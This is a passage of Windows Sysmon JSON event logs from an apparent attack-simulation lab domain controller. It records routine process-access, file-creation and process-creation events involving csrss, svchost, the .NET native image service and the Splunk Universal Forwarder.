07:00:01.665","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12F1-5F25-0000-0010518B0A00}","TargetProcessId":"4660","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7211,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:01.665\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12F1-5F25-0000-0010518B0A00}\r\nTargetProcessId: 4660\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:01.665","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12F1-5F25-0000-0010518B0A00}","TargetProcessId":"4660","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7212,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:01.712\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12F1-5F25-0000-00108A8E0A00}\r\nTargetProcessId: 1008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:01.712","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12F1-5F25-0000-00108A8E0A00}","TargetProcessId":"1008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7213,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:01.712\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12F1-5F25-0000-00108A8E0A00}\r\nTargetProcessId: 1008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:01.712","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12F1-5F25-0000-00108A8E0A00}","TargetProcessId":"1008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7214,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:01.712\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12F1-5F25-0000-00108A8E0A00}\r\nTargetProcessId: 1008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:01.712","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12F1-5F25-0000-00108A8E0A00}","TargetProcessId":"1008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7215,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:00:01.775\r\nProcessGuid: {E2A3D6B1-12F1-5F25-0000-00108A8E0A00}\r\nProcessId: 1008\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\3f0-0\\System.Runtime.WindowsRuntime.UI.Xaml.dll\r\nCreationUtcTime: 2020-08-01 07:00:01.775","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:00:01.775","ProcessGuid":"{E2A3D6B1-12F1-5F25-0000-00108A8E0A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\3f0-0\\System.Runtime.WindowsRuntime.UI.Xaml.dll","CreationUtcTime":"2020-08-01 07:00:01.775","EventReceivedTime":"2020-08-01 07:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7216,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:01.808\r\nProcessGuid: {E2A3D6B1-12F1-5F25-0000-0010F9910A00}\r\nProcessId: 2512\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:00:01.808","ProcessGuid":"{E2A3D6B1-12F1-5F25-0000-0010F9910A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7217,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:01.806\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-12F1-5F25-0000-0010F9910A00}\r\nTargetProcessId: 2512\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:01.806","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-12F1-5F25-0000-0010F9910A00}","TargetProcessId":"2512","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7218,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:01.806\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12F1-5F25-0000-0010F9910A00}\r\nTargetProcessId: 2512\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:01.806","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12F1-5F25-0000-0010F9910A00}","TargetProcessId":"2512","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7219,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:01.806\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:01.806","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 